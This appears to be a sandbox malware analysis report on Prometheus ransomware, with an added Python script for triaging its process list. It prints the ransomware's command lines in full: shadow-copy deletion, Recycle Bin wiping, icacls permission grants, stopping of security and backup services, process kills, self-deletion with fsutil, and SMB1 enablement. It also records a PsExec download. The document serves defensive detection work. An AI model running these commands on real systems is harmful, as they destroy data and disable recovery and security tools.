C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| N/A | 239.255.255.250:3702 | N/A | udp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.7.0.255:3 | N/A | udp |
| N/A | 10.7.0.255:3 | N/A | udp |
| N/A | 10.7.0.255:3 | N/A | udp |
| N/A | 10.7.0.255:3 | N/A | udp |
| N/A | 10.7.0.255:3 | N/A | udp |
| N/A | 224.0.0.255:3 | N/A | udp |
| N/A | 224.0.0.255:3 | N/A | udp |
| N/A | 239.255.255.255:3 | N/A | udp |
| N/A | 255.255.255.255:3 | N/A | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.22.18.188:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | prometheusstat.in | udp |
| US | 8.8.8.8:53 | www.imgurupload.com | udp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 8.8.8.8:53 | info.prometheusgroup.com | udp |
| US | 199.60.103.2:443 | info.prometheusgroup.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| N/A | 239.255.255.250:3702 | N/A | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | a41b4f125c422116c63994583cb8d3db |
| SHA1 | 4df39e689197f328fed0b49c8c55d36e11aa8076 |
| SHA256 | 07267f566df694c5e4e15054a5c4d332f679b52bf9fccaf30c5aa7de1af708e8 |
| SHA512 | 894b1c4b6c12dbde098496ed0b3180975860c354c188e0a42a2c8f985efd12b2e163bbc2188d13edc01c40502845773167e15ba92ee6abd2219aceea1c84a859 |
C:\Users\Admin\AppData\Local\Temp\jrwtlxau.exe
| MD5 | c590a84b8c72cf18f35ae166f815c9df |
| SHA1 | b97761358338e640a31eef5e5c5773b633890914 |
| SHA256 | 57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4 |
| SHA512 | dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018 |
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | 063a2b596f25a80d12bc29c8809d01db |
| SHA1 | 3c953fbcf110a6d0d8e5bf85b836906a43d500d4 |
| SHA256 | 96e37cb15d0e47409c388c549336051976f082e29149f8503ace4be3069728ad |
| SHA512 | 1edd687b2dc4886ff9a060bbea692204244efc6405c3a07b5fa5500afafb74a08879f6f7648c26cc5528adfe0eb5830a4badcb931a8a173c60f5e80b4f74d550 |
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 821740b3797047b94157666cc0f3455b |
| SHA1 | 50badabfff08e6c51c89f528a5ffa2123356e901 |
| SHA256 | f19472eb84d7a81e50f907127c9f18cdc0a1c5ddfe974513d98837f8ae2a5578 |
| SHA512 | 4d03c538a64a8ea34cdc99fab14584e43c9d237dbc06682d2be5c0b9a5b9a0f9d2c2e9e86131589d1d767536c2b65d02c992290cb4d7cccbe2e8cd68e54a547d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 6045baccf49e1eba0e674945311a06e6 |
| SHA1 | 379c6234849eecede26fad192c2ee59e0f0221cb |
| SHA256 | 65830a65cb913bee83258e4ac3e140faf131e7eb084d39f7020c7acc825b0a58 |
| SHA512 | da32af6a730884e73956e4eb6bff61a1326b3ef8ba0a213b5b4aad6de4fbd471b3550b6ac2110f1d0b2091e33c70d44e498f897376f8e1998b1d2afac789abeb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 06fcadd4009c49c3d024e7c3ff9ab157 |
| SHA1 | 3540d151afcad25a99889ce1e4bf96c974ec8d61 |
| SHA256 | 5c4fa483a4aabfb34e53df4d44f76a9357e9da74394d0bb6f2cc692e929daea7 |
| SHA512 | 902eb5d61b0b06d2e5ac6fc946fb389e75c802f8b6128eb14b59b217d9af7fe4f55784141ee27a1fa37418f8f12c775e1141abf7401b4220e4fbd8fc9dc18bb9 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-06-02 15:02
Reported
2021-06-02 15:04
Platform
win10v20210408
Max time kernel
149s
Max time network
158s
Command Line
Signatures
Prometheus Ransomware
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec.exe | N/A | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Kills process with taskkill
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
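The registry rows above and the Processes list that follows are the pre-encryption staging Prometheus performs with built-in tools. LocalAccountTokenFilterPolicy = 1 switches off UAC remote restrictions, so a local administrator account connecting over the network receives a full-privilege token, which PsExec-style remote execution with a local account needs; EnableLinkedConnections = 1 makes the logged-on user's mapped drives visible to elevated processes, so the encryptor can reach them; legalnoticecaption and legalnoticetext put the ransom note on the pre-logon screen. The command lines then remove Raccine, wipe the Recycle Bin, delete shadow copies through WMI, grant Everyone full control on every drive, stop backup, database and security services, kill the processes that hold data files open, and enable SMB1, network discovery and file sharing before net view, arp -a and net use are used to reach other hosts. Several commands are malformed exactly as the malware emitted them: the Unicode quotes around names such as “Sophos Safestore Service” are not quote characters to cmd.exe or net.exe, so the name arrives as several arguments and the stop does not apply to the intended service; taskkill.exe IM thunderbird.exe lacks the slash; net1 stop MSSQL$SBSMONITORING / lacks the y. Detections should therefore fire on the attempt in process-creation telemetry rather than on a service actually stopping. The script below is an added example, not part of this sandbox report: it parses a process list in the page's path/command-line layout, buckets each command into an ATT&CK-style category of the example's own naming, and collects the targeted services and images so the list can feed hunting queries. The sample lines are copied from this page; the regexes and bucket names are the example's own assumptions.

```python
"""Triage a sandbox 'Processes' list (image-path line, then command-line line).

Added example for this report, not sandbox output. Bucket names and regexes are
this example's own choices; the sample lines are copied from the page.
"""
import re
from collections import Counter

# Representative pairs copied verbatim from the Processes list on this page.
SAMPLE = r'''
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39
'''

STOP_RE = re.compile(r'\bnet1?(?:\.exe)?"?\s+stop\s+(.+?)\s*/y?\s*$', re.I)
SC_RE = re.compile(r'\bsc(?:\.exe)?"?\s+config\s+(\S+)\s+start=\s*(auto|disabled)', re.I)
KILL_RE = re.compile(r'\btaskkill(?:\.exe)?"?\s.*?/IM\s+(\S+)', re.I)  # a bare "IM" does not match

def parse_process_list(text):
    """Pair the alternating image-path and command-line lines."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected alternating image-path and command-line lines")
    return list(zip(lines[0::2], lines[1::2]))

def classify(cmd):
    """Map one command line to (bucket, target); the first matching rule wins."""
    c = cmd.lower()
    if "raccine" in c:
        return "impair_defenses:raccine", None
    if re.search(r"win32_shadowcopy|vssadmin\s+delete\s+shadows|shadowcopy\s+delete", c):
        return "inhibit_recovery:shadow_copies", None
    if re.search(r"\brd\s+/s\s+/q\b.*\$recycle\.bin", c):
        return "inhibit_recovery:recycle_bin", None
    if re.search(r"\bicacls\b.*/grant\s+everyone:f", c):
        return "permissions:everyone_full_control", None
    if re.search(r"\bnetsh\b.*advfirewall.*enable=yes", c):
        return "firewall:rule_group_enabled", None
    if "enable-windowsoptionalfeature" in c and "smb1protocol" in c:
        return "lateral_prep:smb1_enabled", None
    if m := SC_RE.search(cmd):
        if m.group(2).lower() == "disabled":
            return "service_disabled", m.group(1)
        return "lateral_prep:service_enabled", m.group(1)
    if m := STOP_RE.search(cmd):
        # ASCII quotes are stripped; Unicode quotes stay, since cmd/net never saw them as quoting
        return "service_stop", m.group(1).strip('"')
    if m := KILL_RE.search(cmd):
        return "process_kill", m.group(1)
    if re.search(r'\bnet\s+view\b|\barp"?\s+-a\b|\bnet(?:\.exe)?"?\s+use\s+\\\\', c):
        return "discovery:network", None
    return "unclassified", None

def triage(text):
    """Summarise a process list into hunt-ready findings."""
    buckets = Counter()
    out = {"services_targeted": [], "processes_killed": [], "unclassified": []}
    for _path, cmd in parse_process_list(text):
        bucket, target = classify(cmd)
        buckets[bucket] += 1
        if bucket in ("service_stop", "service_disabled"):
            out["services_targeted"].append(target)
        elif bucket == "process_kill":
            out["processes_killed"].append(target)
        elif bucket == "unclassified":
            out["unclassified"].append(cmd)  # kept verbatim for manual review
    out["buckets"] = dict(buckets)
    return out

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run it as a script to print the summary for the embedded sample, or pass the whole Processes list from this page to triage(). Whatever lands in unclassified is kept verbatim for manual review; on this page that would be the sample's own launch line, the two svchost service hosts, the net1 start lines and the taskkill call that lost its /IM switch. The Unicode-quoted service names come out of services_targeted with their quotes still attached, which is the quickest way to spot which of the stop commands could never have worked.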
Processes
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
